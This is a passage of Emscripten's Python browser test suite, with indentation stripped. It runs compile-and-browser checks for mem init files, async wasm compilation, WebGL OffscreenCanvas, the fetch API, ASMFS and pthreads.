self.run_browser('test.html', None, '/report_result?0')
# Test that it is possible to send a signal by calling alarm(timeout), which in turn invokes the signal handler set by signal(SIGALRM, func).
def test_sigalrm(self):
self.btest(path_from_root('tests', 'sigalrm.cpp'), expected='0', args=['-O3'])
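# Test the mem init file with source data containing every possible pair of byte values.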
@no_wasm_backend('mem init file')
def test_meminit_pairs(self):
d = 'const char *data[] = {\n "'
d += '",\n "'.join(''.join('\\x{:02x}\\x{:02x}'.format(i, j)
for j in range(256)) for i in range(256))
with open(path_from_root('tests', 'meminit_pairs.c')) as f:
d += '"\n};\n' + f.read()
args = ["-O2", "--memory-init-file", "0", "-s", "MEM_INIT_METHOD=2", "-s", "ASSERTIONS=1", '-s', 'WASM=0']
self.btest(d, expected='0', args=args + ["--closure", "0"])
self.btest(d, expected='0', args=args + ["--closure", "0", "-g"])
self.btest(d, expected='0', args=args + ["--closure", "1"])
@no_wasm_backend('mem init file')
def test_meminit_big(self):
d = 'const char *data[] = {\n "'
d += '",\n "'.join([''.join('\\x{:02x}\\x{:02x}'.format(i, j)
for j in range(256)) for i in range(256)] * 256)
with open(path_from_root('tests', 'meminit_pairs.c')) as f:
d += '"\n};\n' + f.read()
assert len(d) > (1 << 27) # over 128MB of source escapes, i.e. a memory initializer larger than 32MB
args = ["-O2", "--memory-init-file", "0", "-s", "MEM_INIT_METHOD=2", "-s", "ASSERTIONS=1", '-s', 'WASM=0']
self.btest(d, expected='0', args=args + ["--closure", "0"])
self.btest(d, expected='0', args=args + ["--closure", "0", "-g"])
self.btest(d, expected='0', args=args + ["--closure", "1"])
def test_canvas_style_proxy(self):
self.btest('canvas_style_proxy.c', expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests/canvas_style_proxy_shell.html'), '--pre-js', path_from_root('tests/canvas_style_proxy_pre.js')])
def test_canvas_size_proxy(self):
self.btest(path_from_root('tests', 'canvas_size_proxy.c'), expected='0', args=['--proxy-to-worker'])
def test_custom_messages_proxy(self):
self.btest(path_from_root('tests', 'custom_messages_proxy.c'), expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests', 'custom_messages_proxy_shell.html'), '--post-js', path_from_root('tests', 'custom_messages_proxy_postjs.js')])
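# Test --separate-asm: the asm.js code can be split into its own file and loaded from a separate <script> tag.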
@no_wasm_backend('asm.js')
def test_separate_asm(self):
for opts in [['-O0'], ['-O1'], ['-O2'], ['-O2', '--closure', '1']]:
print(opts)
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
self.compile_btest(['src.cpp', '-o', 'test.html', '-s', 'WASM=0'] + opts)
self.run_browser('test.html', None, '/report_result?0')
print('run one')
create_test_file('one.html', '<script src="test.js"></script>')
self.run_browser('one.html', None, '/report_result?0')
print('run two')
run_process([PYTHON, path_from_root('tools', 'separate_asm.py'), 'test.js', 'asm.js', 'rest.js'])
create_test_file('two.html', '''
<script>
var Module = {};
</script>
<script src="asm.js"></script>
<script src="rest.js"></script>
''')
self.run_browser('two.html', None, '/report_result?0')
print('run hello world')
self.clear()
assert not os.path.exists('tests.asm.js')
self.btest('browser_test_hello_world.c', expected='0', args=opts + ['-s', 'WASM=0', '--separate-asm'])
self.assertExists('test.asm.js')
os.unlink('test.asm.js')
print('see a fail')
self.run_browser('test.html', None, '[no http server activity]', timeout=5) # fail without the asm
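# EMTERPRETIFY_FILE writes the emterpreter bytecode to a side file; the custom shell below
# downloads code.dat itself and hands it to the runtime via Module.emterpreterFile.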
@no_wasm_backend('emterpretify - bytecode in a file')
def test_emterpretify_file(self):
create_test_file('shell.html', '''
<!--
{{{ SCRIPT }}} // ignore this, we do it ourselves
-->
<script>
var Module = {};
var xhr = new XMLHttpRequest();
xhr.open('GET', 'code.dat', true);
xhr.responseType = 'arraybuffer';
xhr.onload = function() {
Module.emterpreterFile = xhr.response;
var script = document.createElement('script');
script.src = "test.js";
document.body.appendChild(script);
};
xhr.send(null);
</script>
''')
try_delete('code.dat')
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_FILE="code.dat"', '-O2', '-g', '--shell-file', 'shell.html', '-s', 'ASSERTIONS=1'])
self.assertExists('code.dat')
try_delete('code.dat')
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_FILE="code.dat"', '-O2', '-g', '-s', 'ASSERTIONS=1'])
self.assertExists('code.dat')
def test_vanilla_html_when_proxying(self):
for opts in [0, 1, 2]:
print(opts)
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
self.compile_btest(['src.cpp', '-o', 'test.js', '-O' + str(opts), '--proxy-to-worker'])
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
@no_wasm_backend('mem init file')
def test_in_flight_memfile_request(self):
# test the XHR for an asm.js mem init file being in flight already
for o in [0, 1, 2]:
print(o)
opts = ['-O' + str(o), '-s', 'WASM=0']
print('plain html')
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'in_flight_memfile_request.c')).read()))
self.compile_btest(['src.cpp', '-o', 'test.js'] + opts)
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0') # never when we provide our own HTML like this.
print('default html')
self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+)
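# Checks which builds compile wasm asynchronously: the injected shell script wraps
# WebAssembly.instantiate/instantiateStreaming to record whether the async path was taken,
# and WASM_ASYNC_COMPILATION=0 is expected to force the synchronous path.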
@requires_sync_compilation
def test_binaryen_async(self):
# notice when we use async compilation
script = '''
<script>
// note if we do async compilation
var real_wasm_instantiate = WebAssembly.instantiate;
var real_wasm_instantiateStreaming = WebAssembly.instantiateStreaming;
if (typeof real_wasm_instantiateStreaming === 'function') {
WebAssembly.instantiateStreaming = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiateStreaming(a, b);
};
} else {
WebAssembly.instantiate = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiate(a, b);
};
}
// show stderr for the viewer's fun
err = function(x) {
out('<<< ' + x + ' >>>');
console.log(x);
};
</script>
{{{ SCRIPT }}}
'''
shell_with_script('shell.html', 'shell.html', script)
common_args = ['--shell-file', 'shell.html']
for opts, expect in [
([], 1),
(['-O1'], 1),
(['-O2'], 1),
(['-O3'], 1),
(['-s', 'WASM_ASYNC_COMPILATION=1'], 1), # force it on
(['-O1', '-s', 'WASM_ASYNC_COMPILATION=0'], 0), # force it off
]:
print(opts, expect)
self.btest('binaryen_async.c', expected=str(expect), args=common_args + opts)
# Ensure that compilation still works and is async without instantiateStreaming available
no_streaming = ' <script> WebAssembly.instantiateStreaming = undefined;</script>'
shell_with_script('shell.html', 'shell.html', no_streaming + script)
self.btest('binaryen_async.c', expected='1', args=common_args)
# Test that implementing Module.instantiateWasm() callback works.
def test_manual_wasm_instantiate(self):
src = 'src.cpp'
create_test_file(src, self.with_report_result(open(path_from_root('tests', 'manual_wasm_instantiate.cpp')).read()))
self.compile_btest(['src.cpp', '-o', 'manual_wasm_instantiate.js', '-s', 'BINARYEN=1'])
shutil.copyfile(path_from_root('tests', 'manual_wasm_instantiate.html'), 'manual_wasm_instantiate.html')
self.run_browser('manual_wasm_instantiate.html', 'wasm instantiation succeeded', '/report_result?1')
def test_binaryen_worker(self):
self.do_test_worker(['-s', 'WASM=1'])
def test_wasm_locate_file(self):
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
self.clear()
os.makedirs('cdn')
create_test_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.wasm") return "cdn/test.wasm"; else return filename; }, '))
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
self.compile_btest(['src.cpp', '--shell-file', 'shell2.html', '-s', 'WASM=1', '-o', 'test.html'])
shutil.move('test.wasm', os.path.join('cdn', 'test.wasm'))
self.run_browser('test.html', '', '/report_result?0')
def test_utf8_textdecoder(self):
self.btest('benchmark_utf8.cpp', expected='0', args=['--embed-file', path_from_root('tests/utf8_corpus.txt') + '@/utf8_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF8ToString"]'])
def test_utf16_textdecoder(self):
self.btest('benchmark_utf16.cpp', expected='0', args=['--embed-file', path_from_root('tests/utf16_corpus.txt') + '@/utf16_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF16ToString","stringToUTF16","lengthBytesUTF16"]'])
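# Builds three variants: JS fallback only (TEXTDECODER=0), the default TextDecoder-with-fallback,
# and TextDecoder-only (TEXTDECODER=2), then compares the generated JS sizes to confirm each
# option actually changes the emitted code.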
def test_TextDecoder(self):
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=0'])
just_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0')
td_with_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=2'])
td_without_fallback = os.path.getsize('test.js')
self.assertLess(td_without_fallback, just_fallback)
self.assertLess(just_fallback, td_with_fallback)
@no_fastcomp('not optimized in fastcomp')
def test_small_js_flags(self):
self.btest('browser_test_hello_world.c', '0', args=['-O3', '--closure', '1', '-s', 'INCOMING_MODULE_JS_API=[]', '-s', 'ENVIRONMENT=web'])
# Check an absolute js code size, with some slack.
size = os.path.getsize('test.js')
print('size:', size)
# Note that this size includes test harness additions (for reporting the result, etc.).
self.assertLess(abs(size - 5754), 100)
# Tests that it is possible to initialize and render WebGL content in a pthread by using OffscreenCanvas.
# -DTEST_CHAINED_WEBGL_CONTEXT_PASSING: Tests that it is possible to transfer WebGL canvas in a chain from main thread -> thread 1 -> thread 2 and then init and render WebGL content there.
@no_chrome('see https://crbug.com/961765')
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_pthread(self):
for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]:
self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL', '-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1'])
# Tests that it is possible to render WebGL content on a <canvas> on the main thread, after it has first been used to render WebGL content in a pthread
# -DTEST_MAIN_THREAD_EXPLICIT_COMMIT: Test the same (WebGL on main thread after pthread), but by using explicit .commit() to swap on the main thread instead of implicit "swap when rAF ends" logic
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self):
self.skipTest('This test is disabled because current OffscreenCanvas does not allow transferring it after a rendering context has been created for it.')
for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]:
self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args + ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL', '-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1'])
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_only_in_pthread(self):
self.btest('gl_only_in_pthread.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL', '-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1'])
# Tests that rendering from client side memory without default-enabling extensions works.
@requires_graphics_hardware
def test_webgl_from_client_side_memory_without_default_enabled_extensions(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DEXPLICIT_SWAP=1', '-DDRAW_FROM_CLIENT_MEMORY=1', '-s', 'FULL_ES2=1'])
# Tests that -s OFFSCREEN_FRAMEBUFFER=1 rendering works.
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DEXPLICIT_SWAP=1'])
# Tests that VAOs can be used even if WebGL enableExtensionsByDefault is set to 0.
@requires_graphics_hardware
def test_webgl_vao_without_automatic_extensions(self):
self.btest('test_webgl_no_auto_init_extensions.c', '0', args=['-lGL', '-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=0'])
# Tests that offscreen framebuffer state restoration works
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer_state_restoration(self):
for args in [
# full state restoration path on WebGL 1.0
['-s', 'USE_WEBGL2=0', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH=1'],
# VAO path on WebGL 1.0
['-s', 'USE_WEBGL2=0'],
['-s', 'USE_WEBGL2=1', '-DTEST_WEBGL2=0'],
# VAO path on WebGL 2.0
['-s', 'USE_WEBGL2=1', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-DTEST_REQUIRE_VAO=1'],
# full state restoration path on WebGL 2.0
['-s', 'USE_WEBGL2=1', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH=1'],
# blitFramebuffer path on WebGL 2.0 (falls back to VAO on Firefox < 67)
['-s', 'USE_WEBGL2=1', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=0'],
]:
cmd = args + ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DEXPLICIT_SWAP=1']
self.btest('webgl_offscreen_framebuffer_swap_with_bad_state.c', '0', args=cmd)
# Tests that -s WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1 rendering works.
@requires_graphics_hardware
def test_webgl_workaround_webgl_uniform_upload_bug(self):
self.btest('webgl_draw_triangle_with_uniform_color.c', '0', args=['-lGL', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1'])
# Tests that using an array of structs in GL uniforms works.
@requires_graphics_hardware
def test_webgl_array_of_structs_uniform(self):
self.btest('webgl_array_of_structs_uniform.c', args=['-lGL', '-s', 'USE_WEBGL2=1'], reference='webgl_array_of_structs_uniform.png')
# Tests that if a WebGL context is created in a pthread on a canvas that has not been transferred to that pthread, WebGL calls are then proxied to the main thread
# -DTEST_OFFSCREEN_CANVAS=1: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it by using Emscripten's EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES="#canvas", then OffscreenCanvas is used
# -DTEST_OFFSCREEN_CANVAS=2: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it by automatic transferring of Module.canvas when EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES is not defined, then OffscreenCanvas is also used
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_proxied_pthread(self):
for asyncify in [0, 1]:
cmd = ['-s', 'USE_PTHREADS=1', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL', '-s', 'GL_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1']
if asyncify:
if not self.is_wasm_backend():
continue
# given the synchronous render loop here, asyncify is needed to see intermediate frames and the gradual color change
cmd += ['-s', 'ASYNCIFY', '-DASYNCIFY']
print(str(cmd))
self.btest('gl_in_proxy_pthread.cpp', expected='1', args=cmd)
@requires_threads
@requires_graphics_hardware
@requires_offscreen_canvas
def test_webgl_resize_offscreencanvas_from_main_thread(self):
for args1 in [[], ['-s', 'PROXY_TO_PTHREAD=1']]:
for args2 in [[], ['-DTEST_SYNC_BLOCKING_LOOP=1']]:
for args3 in [[], ['-s', 'OFFSCREENCANVAS_SUPPORT=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1']]:
cmd = args1 + args2 + args3 + ['-s', 'USE_PTHREADS=1', '-lGL', '-s', 'GL_DEBUG=1', '-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1']
print(str(cmd))
self.btest('resize_offscreencanvas_from_main_thread.cpp', expected='1', args=cmd)
# Tests the feature that the shell html page can preallocate the typed array and place it in Module.buffer before loading the script page.
# In this build mode, the -s TOTAL_MEMORY=xxx option will be ignored.
# Preallocating the buffer in this way is asm.js only (wasm needs a Memory).
@no_wasm_backend('asm.js feature')
def test_preallocated_heap(self):
self.btest('test_preallocated_heap.cpp', expected='1', args=['-s', 'WASM=0', '-s', 'TOTAL_MEMORY=16MB', '-s', 'ABORTING_MALLOC=0', '--shell-file', path_from_root('tests', 'test_preallocated_heap_shell.html')])
# Tests emscripten_fetch() usage to XHR data directly to memory without persisting results to IndexedDB.
def test_fetch_to_memory(self):
# Test error reporting in the negative case when the file URL doesn't exist. (http 404)
self.btest('fetch/to_memory.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-DFILE_DOES_NOT_EXIST'],
also_asmjs=True)
# Test the positive case when the file URL exists. (http 200)
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
for arg in [[], ['-s', 'FETCH_SUPPORT_INDEXEDDB=0']]:
self.btest('fetch/to_memory.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'] + arg,
also_asmjs=True)
def test_fetch_to_indexdb(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/to_indexeddb.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'],
also_asmjs=True)
# Tests emscripten_fetch() usage to persist an XHR into IndexedDB and subsequently load up from there.
def test_fetch_cached_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/cached_xhr.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'],
also_asmjs=True)
# Tests that response headers get set on emscripten_fetch_t values.
@requires_threads
def test_fetch_response_headers(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/response_headers.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'], also_asmjs=True)
# Test emscripten_fetch() usage to stream an XHR into memory without storing the full file in memory
def test_fetch_stream_file(self):
self.skipTest('moz-chunked-arraybuffer was firefox-only and has been removed')
# Strategy: create a large 128MB file, and compile with a small 16MB Emscripten heap, so that the tested file
# won't fully fit in the heap. This verifies that streaming works properly.
s = '12345678'
for i in range(14):
s = s[::-1] + s # length of str will be 2^17=128KB
with open('largefile.txt', 'w') as f:
for i in range(1024):
f.write(s)
self.btest('fetch/stream_file.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'TOTAL_MEMORY=536870912'],
also_asmjs=True)
# Tests emscripten_fetch() usage in synchronous mode when used from the main
# thread proxied to a Worker with -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_fetch_sync_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Tests emscripten_fetch() usage when the user passes none of the three main flags (append/replace/no_download).
# In that case, append is implicitly understood.
@requires_threads
def test_fetch_implicit_append(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Tests synchronous emscripten_fetch() usage from wasm pthread in fastcomp.
@no_wasm_backend("fetch API uses an asm.js based web worker to run synchronous XHRs and IDB operations")
def test_fetch_sync_xhr_in_wasm(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH=1', '-s', 'WASM=1', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Tests that the Fetch API works for synchronous XHRs when used with --proxy-to-worker.
@requires_threads
def test_fetch_sync_xhr_in_proxy_to_worker(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '--proxy-to-worker'],
also_asmjs=True)
# Tests waiting on EMSCRIPTEN_FETCH_WAITABLE request from a worker thread
@requires_threads
def test_fetch_sync_fetch_in_main_thread(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_fetch_in_main_thread.cpp', expected='0', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_fetch_idb_store(self):
self.btest('fetch/idb_store.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_fetch_idb_delete(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/idb_delete.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_asmfs_hello_file(self):
# Test basic file loading and the valid character set for files.
os.mkdir('dirrey')
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), os.path.join(self.get_dir(), 'dirrey', 'hello file !#$%&\'()+,-.;=@[]^_`{}~ %%.txt'))
self.btest('asmfs/hello_file.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_asmfs_read_file_twice(self):
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), 'hello_file.txt')
self.btest('asmfs/read_file_twice.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_asmfs_fopen_write(self):
self.btest('asmfs/fopen_write.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_mkdir_create_unlink_rmdir(self):
self.btest('cstdio/test_remove.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_dirent_test_readdir(self):
self.btest('dirent/test_readdir.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_dirent_test_readdir_empty(self):
self.btest('dirent/test_readdir_empty.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_unistd_close(self):
self.btest('unistd/close.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_unistd_access(self):
self.btest('unistd/access.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_unistd_unlink(self):
# TODO: Once symlinks are supported, remove -DNO_SYMLINK=1
self.btest('unistd/unlink.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-DNO_SYMLINK=1'])
@requires_threads
def test_asmfs_test_fcntl_open(self):
self.btest('fcntl/test_fcntl_open.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_asmfs_relative_paths(self):
self.btest('asmfs/relative_paths.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_pthread_locale(self):
for args in [
[],
['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'],
]:
print("Testing with: ", args)
self.btest('pthread/test_pthread_locale.c', expected='1', args=args)
# Tests the Emscripten HTML5 API emscripten_set_canvas_element_size() and emscripten_get_canvas_element_size() functionality in singlethreaded programs.
def test_emscripten_set_canvas_element_size(self):
self.btest('emscripten_set_canvas_element_size.c', expected='1')
# Test that emscripten_get_device_pixel_ratio() is callable from pthreads (and proxies to main thread to obtain the proper window.devicePixelRatio value).
@requires_threads
def test_emscripten_get_device_pixel_ratio(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_get_device_pixel_ratio.c', expected='1', args=args)
# Tests that emscripten_run_script() variants of functions work in pthreads.
@requires_threads
def test_pthread_run_script(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_script.cpp'), expected='1', args=['-O3', '--separate-asm'] + args)
# Tests emscripten_set_canvas_element_size() and OffscreenCanvas functionality in different build configurations.
@requires_threads
@requires_graphics_hardware
def test_emscripten_animate_canvas_element_size(self):
for args in [
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_EXPLICIT_CONTEXT_SWAP=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_MANUALLY_SET_ELEMENT_CSS_SIZE=1'],
]:
cmd = ['-lGL', '-O3', '-g2', '--shell-file', path_from_root('tests', 'canvas_animate_resize_shell.html'), '--separate-asm', '-s', 'GL_DEBUG=1', '--threadprofiler'] + args
print(' '.join(cmd))
self.btest('canvas_animate_resize.cpp', expected='1', args=cmd)
# Tests the absolute minimum pthread-enabled application.
@requires_threads
def test_pthread_hello_thread(self):
for opts in [[], ['-O3']]:
for modularize in [[], ['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')]]:
self.btest(path_from_root('tests', 'pthread', 'hello_thread.c'), expected='1', args=['-s', 'USE_PTHREADS=1'] + modularize + opts)
# Tests memory growth in pthreads mode, but still on the main thread.
@no_chrome('https://bugs.chromium.org/p/v8/issues/detail?id=9062')
@requires_threads
def test_pthread_growth_mainthread(self):
def run(emcc_args=[]):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_memory_growth_mainthread.c'), expected='1', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'TOTAL_MEMORY=32MB', '-s', 'WASM_MEM_MAX=256MB'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'MODULARIZE_INSTANCE=1'])
run(['-s', 'PROXY_TO_PTHREAD=1'])
# Tests memory growth in a pthread.
@no_chrome('https://bugs.chromium.org/p/v8/issues/detail?id=9065')
@requires_threads
def test_pthread_growth(self):
def run(emcc_args=[]):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_memory_growth.c'), expected='1', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'TOTAL_MEMORY=32MB', '-s', 'WASM_MEM_MAX=256MB', '-g'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'ASSERTIONS=1'])
run(['-s', 'PROXY_TO_PTHREAD=1'])
# Tests that it is possible to load the main .js file of the application manually via a Blob URL, and still use pthreads.
@requires_threads
def test_load_js_from_blob_with_pthreads(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
src = 'src.c'
